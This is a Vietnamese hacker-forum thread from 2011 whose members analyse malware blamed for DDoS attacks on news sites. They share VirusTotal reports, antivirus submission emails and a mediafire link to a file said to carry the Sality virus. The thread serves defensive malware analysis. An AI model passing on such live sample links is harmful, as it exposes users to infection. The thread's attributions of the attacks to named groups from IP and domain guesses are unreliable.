Cảm ơn vndncn. Nhắc mới nhớ, mình có thằng bạn nằm vùng trong giới RCE, đang làm trong team Windows Defender. Hì hì, gởi riêng cho nó toàn bộ "mèo què" của mấy anh stl này mới được. Hỏi riêng mấy anh stl cái: Em gởi mẫu cho MS có bị cấm, bị bắt không mấy anh ? Không thì mấy anh chụp mũ em tiết lộ bí mật xxx, thông tin xxx gì đó nữa, tội em lắm ? Bà con nào biết, kiểm tra giùm em IP 113.172.223.104 (IP của VDC), lúc 2:39 chiều là của thằng nào ? PM riêng cho em nhé ! 
anh Tờ Quy Anh ơi, anh có cần ngươi theo bảo vệ anh không vậy? Em kêu mấy thằng đàn em của em theo bảo vệ anh nha.Em là trùm giang hồ quận 4 đây,có thằng nào hó hé anh cứ kêu em bảo kê cho nha:-) ]]>
/hvaonline/posts/list/39641.html#245606 /hvaonline/posts/list/39641.html#245606 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. goopdate.dll, up lên liền nhé. Tôi đợi, vì ngày mai tôi phải đi xa vài ngày rồi. Có file này thì hy vọng sẽ lòi ra nguồn ddos server của stl vào vietnamnet.]]> /hvaonline/posts/list/39641.html#245607 /hvaonline/posts/list/39641.html#245607 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#245608 /hvaonline/posts/list/39641.html#245608 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#245609 /hvaonline/posts/list/39641.html#245609 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#245610 /hvaonline/posts/list/39641.html#245610 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

angel_of_devil wrote:
Bạn ko biết/hiểu thì nên theo dõi hoặc đọc lại từ page 1, đừng nhảy bổ vào rồi băn khoăn cái kiểu chưa chắc là STL này nọ v.v... Đi tắt trong CNTT ko thành công đc đâu 
sao bạn giám chắc là mình không theo dõi từ đầu!? Mình chỉ không giám khẳng định một cách chắc chắn 100% bạn ạh, dù bạn có nghi ngờ và có bằng chứng 99% thì cũng không phải là 100% mà đúng không nào!! Mình hỏi ở trên vì chỉ có chút thắc mắc nhỏ nhỏ vậy thôi!!]]>
/hvaonline/posts/list/39641.html#245613 /hvaonline/posts/list/39641.html#245613 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

texudo wrote:
Qua thông tin X-Cafe và IP, search ra một đống Domain với IP bắt đầu bằng 91.211.116.*. http://bgp.he.net/net/91.211.116.0/22#_dns Chính xác là SINHTULENH rồi: 91.211.116.185 sinhtulenh.org, sinhtuphu.org  
Mình dám khẳng định bạn ko đọc từ đầu, mà có đọc thì cũng qua quýt hời hợt, đọc mà như ko!]]>
/hvaonline/posts/list/39641.html#245616 /hvaonline/posts/list/39641.html#245616 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN wrote:
Bà con nào biết, kiểm tra giùm em IP 113.172.223.104 (IP của VDC), lúc 2:39 chiều, ngày hôm nay: 22-08-2011, là của thằng nào ? PM riêng cho em nhé ! 
hờ hờ....cái kiểm tra Ip này thì mấy a từ Smod trở lên là kiểm tra được mà a.bảo mấy a đó kiểm tra giúp cho :):):) hj`.mà a cứ "công khai việc xấu" của tụi nó lên thế này không sợ tụi nó thù dzai rùi hum nào oánh lẻ a ak??? :D:D:D à mà lần trước em có hỏi là cái Unikey cúa em bị dính virus (em là mem mới tìm hiểu CNNT) nhưng không diệt được là sao a?? bài của em bị move đi đâu ấy :(:(]]>
/hvaonline/posts/list/39641.html#245618 /hvaonline/posts/list/39641.html#245618 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#245620 /hvaonline/posts/list/39641.html#245620 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN wrote:
PS: Bỏ cái trò comment hù doạ trên cái bờ lốc bỏ hoang của em đi nhé, mấy anh stl. Chơi vậy là hèn lắm đấy. Đấu với nhau bằng kỷ thuật không lại giờ quay ra hù doạ em à ? Hu hu, em sợ quá, mấy anh tha cho em :-( :-( :-) =))  
Hì hì, coi chừng có ông nội nào tát nước theo mưa đó em. Anh không nghĩ stl con nít và sơ suất đến độ tức khí mà lên cái blog của em để comment. Nếu quả thật mấy bạn stl mà chơi trò hù doạ trên blog như thế này thì chứng tỏ mấy bạn đó đi tới chỗ cùng kiệt rồi đó. Hù doạ là hành động thể hiện sự bất lực. Chỉ có điều mấy anh em ở HVA chả làm cái gì phi pháp hết. Tất cả đều công khai, giấy trắng mực đen, bằng chứng còn rành rành ra đó. Sẵn tiện nói luôn để mấy bạn stl biết là loạt RE này trên HVA không chỉ có dân kỹ thuật người Việt mà cả dân malware analysis thứ thiệt chú ý. Cả google, mcAfee, Sophos, Avira, Microsoft và một số nhóm nghiên cứu malware đang theo dõi rất sát (chỉ có bkis là im re, hì hì). Các bạn stl muốn chơi "bạch hoá" hả? HVA chơi RE lai rai như vầy là văn nghệ lắm rồi chớ chơi thấu cáy kiểu oanh tẹc na sô nan thì mệt á. Đến lúc đó, chính các bạn sẽ bị rớt vô chỗ "đem con bỏ chợ", "vắt chanh bỏ vỏ" đó.]]>
/hvaonline/posts/list/39641.html#245624 /hvaonline/posts/list/39641.html#245624 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. goopdate.dll lên nè, bà con ơi.]]> /hvaonline/posts/list/39641.html#245625 /hvaonline/posts/list/39641.html#245625 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. GoogleCrashHandler.exe thì vẫn có Digital signatures...nên e nghĩ chắc là không bị dính mèo què của stl đâu pk anh? e chạy tool anh viết cũng file not found]]> /hvaonline/posts/list/39641.html#245627 /hvaonline/posts/list/39641.html#245627 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#245629 /hvaonline/posts/list/39641.html#245629 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#245631 /hvaonline/posts/list/39641.html#245631 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale wrote:

TQN wrote:
PS: Bỏ cái trò comment hù doạ trên cái bờ lốc bỏ hoang của em đi nhé, mấy anh stl. Chơi vậy là hèn lắm đấy. Đấu với nhau bằng kỷ thuật không lại giờ quay ra hù doạ em à ? Hu hu, em sợ quá, mấy anh tha cho em :-( :-( :-) =))  
Hì hì, coi chừng có ông nội nào tát nước theo mưa đó em. Anh không nghĩ stl con nít và sơ suất đến độ tức khí mà lên cái blog của em để comment. Nếu quả thật mấy bạn stl mà chơi trò hù doạ trên blog như thế này thì chứng tỏ mấy bạn đó đi tới chỗ cùng kiệt rồi đó. Hù doạ là hành động thể hiện sự bất lực. Chỉ có điều mấy anh em ở HVA chả làm cái gì phi pháp hết. Tất cả đều công khai, giấy trắng mực đen, bằng chứng còn rành rành ra đó. Sẵn tiện nói luôn để mấy bạn stl biết là loạt RE này trên HVA không chỉ có dân kỹ thuật người Việt mà cả dân malware analysis thứ thiệt chú ý. Cả google, mcAfee, Sophos, Avira, Microsoft và một số nhóm nghiên cứu malware đang theo dõi rất sát (chỉ có bkis là im re, hì hì). Các bạn stl muốn chơi "bạch hoá" hả? HVA chơi RE lai rai như vầy là văn nghệ lắm rồi chớ chơi thấu cáy kiểu oanh tẹc na sô nan thì mệt á. Đến lúc đó, chính các bạn sẽ bị rớt vô chỗ "đem con bỏ chợ", "vắt chanh bỏ vỏ" đó. 
em nghĩ sau cái vụ này HVA sẽ nổi danh trong giới võ lâm giang hồ đó nha,mà một phần cũng cám ơn mấy anh stl "sờ mong lợn" :-) có khi mình phải đãi tiệc ở NewWord để cám ơn mấy anh stl đó, nha mấy anh em. :-) ]]>
/hvaonline/posts/list/39641.html#245632 /hvaonline/posts/list/39641.html#245632 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#245635 /hvaonline/posts/list/39641.html#245635 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#245645 /hvaonline/posts/list/39641.html#245645 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. HTTP error code 503- Service unavailable (Dịch vụ không sẵn sàng đáp ứng cho người truy cập)' Lỗi 503 là lỗi về phía server (webserver) mà nguyên nhân chính là do nó bị quá tải (overload). Đọc một bài của TQN trong topic này, thấy thông báo là DDoS tool của STL tấn công vào một URL nằm "sâu" trong website, đó là URL: http://danlambaovn.blogspot.com/2011/08/mong-anh-ung-la-tay-sai-cua-duch-thu.html tôi hơi ngạc nhiên. Theo dõi diễn biến nhiều quá trình DDos tại VN và thế giới, tôi thấy rất ít khi mang bot tấn công vào một URL (trang web) nằm "sâu" đến thế, thường chúng chỉ tấn công vào trang mở đầu (thường là trang chủ) chủ hay trang kế tiếp. Có nhiều lý do, trong đó có lý do là hacker phải mất nhiều thời gian để xem toàn bộ nội dung của website, để tìm ra đúng trang (URL) cần đánh. DDoS hacker bình thường thì chả ai mất công tìm tòi như vậy cả. Chỉ có "Political DDoS" thì có thể (từ mới chế của PXMMRF-HVA đấy nhé) Hôm nay (23-8-2011), vào vietnamnet.net xem, thấy truy cập hơi chậm. Chắc vietnamnet lại bị STL tân công DDoS đây, nhưng cường độ không cao. Hay chưa đến lúc cao nhỉ? Hỉ hì. Có 3 tiểu mục quan trong ở dưới một cửa sổ Flash trên trang chủ:
.Chủ tịch nước: Tên tuổi Tướng Giáp mãi đi vào lịch sử .Biểu tình ở Đại Liên và tiếng nói người dân .Đừng để có nhiều 'nghị sĩ rau muống' 
Các tiểu muc này truy cập để xem rất khó và rất chậm so với các muc khác trên trang chủ. Tiểu mục 1 (Chủ tịch nước: Tên tuổi Tướng Giáp mãi đi vào lịch sử) thì đặt ở directory: http://vietnamnet.vn/vn/chinh-tri/36413/chu-tich-nuoc--ten-tuoi-tuong-giap-mai-di-vao-lich-su.html , tiểu mục 3 thì ở: http://vietnamnet.vn/vn/chinh-tri/36384/dung-de-co-nhieu--nghi-si-rau-muong-.html . Hai tiễu muc này truy cập đến rất chậm, nhưng bài viết vẫn còn hiện ra được, sau khi kiên nhẫn chờ đợi. Còn tiểu mục 2: Biểu tình ở Đại Liên và tiếng nói người dân (có vẻ nhạy cảm đây!) , thì không thể nào truy cập được, chờ lâu không hiện ra một chữ, luôn time-out. Nghĩa là: wait for nothing. Chắc là tiểu mục 2 này nằm ở directory: http://vietnamnet.vn/vn/chinh-tri/36xxx/bieu-tinh-o-dai-lien-va-tieng-noi-nguoi-dan.html? Không rõ có phải các bác STL có đang nhằm DDoS vào đúng trang (URL) này không? Y như các bác đã làm trường hợp tấn công website danlambao ấy, như nói ở trên. Tất nhiên chỉ có các admin. của Vietnamnet mới trả lời chính xác câu hỏi này. Đúng không các bác? ]]>
/hvaonline/posts/list/39641.html#245647 /hvaonline/posts/list/39641.html#245647 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#245652 /hvaonline/posts/list/39641.html#245652 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. http://www.virustotal.com/file-scan/report.html?id=f258be0f4ea0174f87731f0c879170ba162dcfba058bf9dd3c5aead98252fc0e-1314072852 http://www.mediafire.com/?k7xd7nj50bs59jv (Chú ý: Các bạn không nên dơwnload File GoogleUpdate.exe này về máy, trừ khi muốn nghiên cứu một virus khác, virus "Sality". Virus Sality có đăc điểm khi nhiễm vào máy sẽ tìm tất cả các file .exe trong máy và nhân bản virus. Virus lấy tên file nguyên bản mà nó vừa nhiễm vào. Vì vậy trong máy sẽ đầy rẫy các nhân bản virus Sality và hệ thông sẽ ngưng chạy-PXMMRF-HVA)]]> /hvaonline/posts/list/39641.html#245655 /hvaonline/posts/list/39641.html#245655 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#245658 /hvaonline/posts/list/39641.html#245658 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

mv1098 wrote:
Gửi các bro mẫu GoogleUpdate.exe, em check không thấy có Digital Sig Scan trên VirusTotal thì ra 1 đống nhưng toàn là Virus Sality http://www.virustotal.com/file-scan/report.html?id=f258be0f4ea0174f87731f0c879170ba162dcfba058bf9dd3c5aead98252fc0e-1314072852 http://www.mediafire.com/?k7xd7nj50bs59jv 
Em tìm thử trên máy có "goopdate.dll" không? Có con nào, zip hết rồi upload lên giúp nha?]]>
/hvaonline/posts/list/39641.html#245660 /hvaonline/posts/list/39641.html#245660 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale wrote:

mv1098 wrote:
Gửi các bro mẫu GoogleUpdate.exe, em check không thấy có Digital Sig Scan trên VirusTotal thì ra 1 đống nhưng toàn là Virus Sality http://www.virustotal.com/file-scan/report.html?id=f258be0f4ea0174f87731f0c879170ba162dcfba058bf9dd3c5aead98252fc0e-1314072852 http://www.mediafire.com/?k7xd7nj50bs59jv 
Em tìm thử trên máy có "goopdate.dll" không? Có con nào, zip hết rồi upload lên giúp nha? 
Xin lỗi file này của em bị hỏng, chờ chút em update]]>
/hvaonline/posts/list/39641.html#245662 /hvaonline/posts/list/39641.html#245662 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#245664 /hvaonline/posts/list/39641.html#245664 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

template wrote:
Mình kiểm tra tất cả đều có chữ ký, không cần up đúng ko bác 
Có chữ ký là đồ xịn, không cần upload bồ ơi. :).]]>
/hvaonline/posts/list/39641.html#245665 /hvaonline/posts/list/39641.html#245665 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

template wrote:
Mình kiểm tra tất cả đều có chữ ký, không cần up đúng ko bác 
Kiểm tra ra kết quả như hình sau thì khỏi upload:
]]>
/hvaonline/posts/list/39641.html#245666 /hvaonline/posts/list/39641.html#245666 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

PXMMRF wrote:
Các bạn ở BKAV và CMC có thể giúp việc này không. Ks Triệu trần Đức (Tổng giám đôc Security CMC)ơi, em có chỉ đạo việc này giúp anh hay không nhỉ? Thank you in advance.  

TQN wrote:
Bà con BKAV có thể giúp mọi người được không ? Hay là cứ giả câm, giả điếc, nhắm mắt làm ngơ ???  
Hic em có thấy mẫu nào của STL mà Bkav ko diệt được đâu nhỉ ? :D . Em dùng Bkav pro thấy diệt hết!]]>
/hvaonline/posts/list/39641.html#245669 /hvaonline/posts/list/39641.html#245669 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

ptv_vbhp wrote:

PXMMRF wrote:
Các bạn ở BKAV và CMC có thể giúp việc này không. Ks Triệu trần Đức (Tổng giám đôc Security CMC)ơi, em có chỉ đạo việc này giúp anh hay không nhỉ? Thank you in advance.  

TQN wrote:
Bà con BKAV có thể giúp mọi người được không ? Hay là cứ giả câm, giả điếc, nhắm mắt làm ngơ ???  
Hic em có thấy mẫu nào của STL mà Bkav ko diệt được đâu nhỉ ? :D . Em dùng Bkav pro thấy diệt hết! 
Screenshot giao diện BKAV lúc nó diệt dc chính xác các file của STL ( toàn bộ ) theo bồ nói rồi up lên đây]]>
/hvaonline/posts/list/39641.html#245671 /hvaonline/posts/list/39641.html#245671 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

ptv_vbhp wrote:

PXMMRF wrote:
Các bạn ở BKAV và CMC có thể giúp việc này không. Ks Triệu trần Đức (Tổng giám đôc Security CMC)ơi, em có chỉ đạo việc này giúp anh hay không nhỉ? Thank you in advance.  

TQN wrote:
Bà con BKAV có thể giúp mọi người được không ? Hay là cứ giả câm, giả điếc, nhắm mắt làm ngơ ???  
Hic em có thấy mẫu nào của STL mà Bkav ko diệt được đâu nhỉ ? :D . Em dùng Bkav pro thấy diệt hết! 
Bồ khoái tiếp thị cho BKIS quá hả? Bồ chỉ có mấy bài trên diễn đàn nhưng chủ yếu là "giả nai" và quảng cáo cho BKIS. Hỏi thử BKAV làm cái gì cho tình trạng của vietnamnet trước đây và ngay bây giờ hở? Đừng làm cho thiên hạ thêm ác cảm vói BKIS.]]>
/hvaonline/posts/list/39641.html#245672 /hvaonline/posts/list/39641.html#245672 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

mv1098 wrote:

conmale wrote:

mv1098 wrote:
Gửi các bro mẫu GoogleUpdate.exe, em check không thấy có Digital Sig Scan trên VirusTotal thì ra 1 đống nhưng toàn là Virus Sality http://www.virustotal.com/file-scan/report.html?id=f258be0f4ea0174f87731f0c879170ba162dcfba058bf9dd3c5aead98252fc0e-1314072852 http://www.mediafire.com/?k7xd7nj50bs59jv 
Em tìm thử trên máy có "goopdate.dll" không? Có con nào, zip hết rồi upload lên giúp nha? 
Xin lỗi file này của em bị hỏng, chờ chút em update 
Coi chừng dll này bị locked. Em thử boot vô safemode rồi mới copy nó. Bảo đảm hơn thì boot bằng HirenCD rồi mới zip nó.]]>
/hvaonline/posts/list/39641.html#245678 /hvaonline/posts/list/39641.html#245678 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale wrote:

template wrote:
Mình kiểm tra tất cả đều có chữ ký, không cần up đúng ko bác 
Có chữ ký là đồ xịn, không cần upload bồ ơi. :). 
Cẩn tắc vô áy náy anh, bài học về Stuxnet sử dụng chữ ký của Realtek vẫn còn đấy :P ]]>
/hvaonline/posts/list/39641.html#245679 /hvaonline/posts/list/39641.html#245679 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

mv1098 wrote:
Gửi các bro mẫu GoogleUpdate.exe, em check không thấy có Digital Sig Scan trên VirusTotal thì ra 1 đống nhưng toàn là Virus Sality http://www.virustotal.com/file-scan/report.html?id=f258be0f4ea0174f87731f0c879170ba162dcfba058bf9dd3c5aead98252fc0e-1314072852 http://www.mediafire.com/?k7xd7nj50bs59jv (Chú ý: Các bạn không nên dơwnload File GoogleUpdate.exe này về máy, trừ khi muốn nghiên cứu một virus khác, virus "Sality". Virus Sality có đăc điểm khi nhiễm vào máy sẽ tìm tất cả các file .exe trong máy và nhân bản virus. Virus lấy tên file nguyên bản mà nó vừa nhiễm vào. Vì vậy trong máy sẽ đầy rẫy các nhân bản virus Sality và hệ thông sẽ ngưng chạy-PXMMRF-HVA
Lâu lâu mới vào forum, anh em post nhộn nhịp quá :D Trong khi chờ toàn bộ file mới của GoogleCrashHandle thì em tải file này về phân tích thử, xem Sality là virus gì mà thấy các hãng phải có tool riêng để remove. Phải đổi gió chút, code của stl RE mãi cũng chán, vì lần nào cũng giống nhau cả.]]>
/hvaonline/posts/list/39641.html#245682 /hvaonline/posts/list/39641.html#245682 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale wrote:

mv1098 wrote:
Gửi các bro mẫu GoogleUpdate.exe, em check không thấy có Digital Sig Scan trên VirusTotal thì ra 1 đống nhưng toàn là Virus Sality http://www.virustotal.com/file-scan/report.html?id=f258be0f4ea0174f87731f0c879170ba162dcfba058bf9dd3c5aead98252fc0e-1314072852 http://www.mediafire.com/?k7xd7nj50bs59jv 
Em tìm thử trên máy có "goopdate.dll" không? Có con nào, zip hết rồi upload lên giúp nha? 
Anh conmale ơi, anh xem cái này ở máy em sao anh nhé ! Em ko úp lên MF được ạ. http://share.vnn.vn/dl.php/4666724]]>
/hvaonline/posts/list/39641.html#245684 /hvaonline/posts/list/39641.html#245684 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#245691 /hvaonline/posts/list/39641.html#245691 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#245694 /hvaonline/posts/list/39641.html#245694 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#245697 /hvaonline/posts/list/39641.html#245697 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. Email thứ 1 lúc 18:27 Thứ Ba, 23 tháng 8 2011 The Microsoft Malware Protection Center (MMPC) strives to keep you informed about the status of your submission. This email communicates what we currently know about the file(s) you submitted. You can view your submission online at http://www.microsoft.com/security/portal/Submission/SubmissionHistory.aspx?SubmissionId=C6AE557B-E5E7-4A5A-9C55-87A04A575689 This information is subject to change pending our analysis and a final email response will be sent to you when analysis is complete and definition updates have been published. If you were to scan the files you submitted using one of Microsoft's Antimalware products such as Microsoft Forefront Client Security or Microsoft Security Essentials, you would see relevant detection information similar to what is displayed below. Submitted Files ============================================= FakeSandboxie_17_08_2011.zip [Trojan:Win32/Vietak.A] +---LoadDLL.exe [Not Malware] +---fytqn613.bin [Changes to detection currently undergoing testing] +---SbieSvc.exe [Trojan:Win32/Vietak.A] +---flower.bin [Not Malware] +---flower.bmp [Not Malware] +---fytqn613.bmp [Not Malware] +---fytqn613.idb [Not Malware] +---monitor.cmd [Not Malware] +---SbieMgm.dll [Changes to detection currently undergoing testing] +---SbieMgm.idb [Not Malware] +---SbieMgm_patched.dll [Not Malware] +---SbieSvc.idb [Not Malware] +---showthread.php [Not Malware] +---showthread_decoded.txt [Not Malware] +---tracker.cmd [Not Malware] The following links contain more information regarding the detections listed above: http://go.microsoft.com/fwlink/?linkid=95666&Entry.aspx&name=Trojan:Win32/Vietak.A Email thứ 2 lúc 19:08 Thứ Ba, 23 tháng 8 2011 Analysis of the file(s) in Submission ID MMPC11082298281125 is now complete. This is the final email that you will receive regarding this submission. The Microsoft Malware Protection Center (MMPC) has investigated the following file(s) which we received on 8/22/2011 1:36:28 AM Pacific Time. Below is the determination for your submission. ======== Submission ID MMPC11082298281125 Submitted Files ============================================= FakeSandboxie_17_08_2011.zip [Trojan:Win32/Vietak.A] +---LoadDLL.exe [Not Malware] +---fytqn613.bin [Trojan:Win32/Vietak.A] +---SbieSvc.exe [Trojan:Win32/Vietak.A] +---flower.bin [Not Malware] +---flower.bmp [Not Malware] +---fytqn613.bmp [Not Malware] +---fytqn613.idb [Not Malware] +---monitor.cmd [Not Malware] +---SbieMgm.dll [Trojan:Win32/Vietak.A] +---SbieMgm.idb [Not Malware] +---SbieMgm_patched.dll [Not Malware] +---SbieSvc.idb [Not Malware] +---showthread.php [Not Malware] +---showthread_decoded.txt [Not Malware] +---tracker.cmd [Not Malware] The following links contain more information regarding the detections listed above: http://go.microsoft.com/fwlink/?linkid=95666&Entry.aspx&name=Trojan:Win32/Vietak.A ]]> /hvaonline/posts/list/39641.html#245700 /hvaonline/posts/list/39641.html#245700 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

xnohat wrote:

ptv_vbhp wrote:

PXMMRF wrote:
Các bạn ở BKAV và CMC có thể giúp việc này không. Ks Triệu trần Đức (Tổng giám đôc Security CMC)ơi, em có chỉ đạo việc này giúp anh hay không nhỉ? Thank you in advance.  

TQN wrote:
Bà con BKAV có thể giúp mọi người được không ? Hay là cứ giả câm, giả điếc, nhắm mắt làm ngơ ???  
Hic em có thấy mẫu nào của STL mà Bkav ko diệt được đâu nhỉ ? :D . Em dùng Bkav pro thấy diệt hết! 
Screenshot giao diện BKAV lúc nó diệt dc chính xác các file của STL ( toàn bộ ) theo bồ nói rồi up lên đây 
Ý "Screenshot giao diện BKAV lúc nó diệt dc chính xác các file của STL ( toàn bộ ) theo bồ nói rồi up lên đây  " của anh xnohat là sao ạ ? Nghĩa là quét virut khi máy bị virut của STL hay là , chỉ cần quét được file mà anh TQn up lên MF là đc ? - E vừa quét xong = BK pro + kis 2012 up date ngày hôm nay : 23/8/2011 luôn với 2 file anh TQN up lên MF là AcrobatUpdater_20_08_2011 và 15_8_2011 => Kis không ho he gì 2 file này cả , BK thì phang đc 1 em 15_8 còn 20_8 thì im re . Các file cũ của anh TQN up lên em chưa thử nên không biết như thế nào - Em không quảng cáo hay làm gì đó BKis đâu nhé ]]>
/hvaonline/posts/list/39641.html#245703 /hvaonline/posts/list/39641.html#245703 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. Ý Screenshot giao diện BKAV lúc nó diệt dc chính xác các file của STL ( toàn bộ ) theo bồ nói rồi up lên đây; của anh xnohat là sao ạ ? Nghĩa là quét virut khi máy bị virut của STL hay là , chỉ cần quét được file mà anh TQn up lên MF là đc ? - E vừa quét xong = BK pro + kis 2012 up date ngày hôm nay : 23/8/2011 luôn với 2 file anh TQN up lên MF là AcrobatUpdater_20_08_2011 và 15_8_2011 => Kis không ho he gì 2 file này cả , BK thì phang đc 1 em 15_8 còn 20_8 thì im re . Các file cũ của anh TQN up lên em chưa thử nên không biết như thế nào - Em không quảng cáo hay làm gì đó BKis đâu nhé   Hình đâu ? , đáng tin cây hơn thì làm 1 clip đi P/s: sao lại có 2 nick ở đây nhỉ ]]> /hvaonline/posts/list/39641.html#245704 /hvaonline/posts/list/39641.html#245704 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.
]]>
/hvaonline/posts/list/39641.html#245705 /hvaonline/posts/list/39641.html#245705 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#245706 /hvaonline/posts/list/39641.html#245706 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

mv1098 wrote:
Mấy bro BKIS này hèn vãi không ra mặt nhưng vẫn âm thầm theo dõi topic để update virus mới vào Database. đúng là miếng thịt ngon thì đớp chặt cục xương khó nhằn thì nhè ra.  
Nhưng mà mấy thằng hèn cũng được cái việc là diệt được khối zombies của Sờ Ti Lợn. thế cũng tạm được rồi .... đúng ra nó nên đặt tên theo anh PXMMRF nói.]]>
/hvaonline/posts/list/39641.html#245708 /hvaonline/posts/list/39641.html#245708 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

mv1098 wrote:
Mấy bro BKIS này hèn vãi không ra mặt nhưng vẫn âm thầm theo dõi topic để update virus mới vào Database. đúng là miếng thịt ngon thì đớp chặt cục xương khó nhằn thì nhè ra.  
Mình thấy vậy là được rồi, chỉ sợ mấy anh ấy "câu nệ" không dám update thì mới là vấn đề. Còn mấy anh ấy chịu update thì coi như HVA mình giúp được người dùng bkav. ]]>
/hvaonline/posts/list/39641.html#245710 /hvaonline/posts/list/39641.html#245710 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

mv1098 wrote:
Mấy bro BKIS này hèn vãi không ra mặt nhưng vẫn âm thầm theo dõi topic để update virus mới vào Database. đúng là miếng thịt ngon thì đớp chặt cục xương khó nhằn thì nhè ra.  
bạn này có vẻ thù hằn nhỉ. AV cập nhật là điều tốt, hay bạn không muốn thế, bạn không muốn cái AV được người Việt sử dụng diệt các mẫu virus người Việt bị nhiễm nhiều nhất. Bạn muốn các virus này tồn tại mãi mãi trên máy người Việt và được cập nhật liên tục chứ gì. Avira , KIS, Microsoft,... cũng cập nhật đấy, để mình viết mail nhắc họ lập nick ở đây, nếu không lại mang tiếng hèn, mang tiếng đớp chặt cục xương. Xét ra chỉ có Symantec không cập nhật, không hèn =)) ]]>
/hvaonline/posts/list/39641.html#245711 /hvaonline/posts/list/39641.html#245711 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

acoustics89 wrote:

mv1098 wrote:
Mấy bro BKIS này hèn vãi không ra mặt nhưng vẫn âm thầm theo dõi topic để update virus mới vào Database. đúng là miếng thịt ngon thì đớp chặt cục xương khó nhằn thì nhè ra.  
bạn này có vẻ thù hằn nhỉ. AV cập nhật là điều tốt, hay bạn không muốn thế, bạn không muốn cái AV được người Việt sử dụng diệt các mẫu virus người Việt bị nhiễm nhiều nhất. Bạn muốn các virus này tồn tại mãi mãi trên máy người Việt và được cập nhật liên tục chứ gì. Avira , KIS, Microsoft,... cũng cập nhật đấy, để mình viết mail nhắc họ lập nick ở đây, nếu không lại mang tiếng hèn, mang tiếng đớp chặt cục xương. Xét ra chỉ có Symantec không cập nhật, không hèn =))  
Mình chỉ tức là họ được tạo điều kiện và có rất nhiều thời gian mà họ không giúp đỡ nhiệt tình như cái vụ giúp anh Hàn Quốc chẳng hạn. trong khi đó con virus này nó ảnh hưởng tới cộng đồng người Việt nhiều như vậy. Mỗi người 1 suy nghĩ nên mình không tranh luận thêm về vấn đề này.]]>
/hvaonline/posts/list/39641.html#245712 /hvaonline/posts/list/39641.html#245712 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

acoustics89 wrote:

mv1098 wrote:
Mấy bro BKIS này hèn vãi không ra mặt nhưng vẫn âm thầm theo dõi topic để update virus mới vào Database. đúng là miếng thịt ngon thì đớp chặt cục xương khó nhằn thì nhè ra.  
bạn này có vẻ thù hằn nhỉ. AV cập nhật là điều tốt, hay bạn không muốn thế, bạn không muốn cái AV được người Việt sử dụng diệt các mẫu virus người Việt bị nhiễm nhiều nhất. Bạn muốn các virus này tồn tại mãi mãi trên máy người Việt và được cập nhật liên tục chứ gì. Avira , KIS, Microsoft,... cũng cập nhật đấy, để mình viết mail nhắc họ lập nick ở đây, nếu không lại mang tiếng hèn, mang tiếng đớp chặt cục xương. Xét ra chỉ có Symantec không cập nhật, không hèn =))  
acoustic89 có vẻ hơi nhạy cảm rồi :D Tớ thấy bạn mv1098 nói cũng có ý đúng, nhưng phải thông cảm cho họ :)]]>
/hvaonline/posts/list/39641.html#245713 /hvaonline/posts/list/39641.html#245713 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

mv1098 wrote:
Mình chỉ tức là họ được tạo điều kiện và có rất nhiều thời gian mà họ không giúp đỡ nhiệt tình như cái vụ giúp anh Hàn Quốc chẳng hạn. trong khi đó con virus này nó ảnh hưởng tới cộng đồng người Việt nhiều như vậy. Mỗi người 1 suy nghĩ nên mình không tranh luận thêm về vấn đề này. 
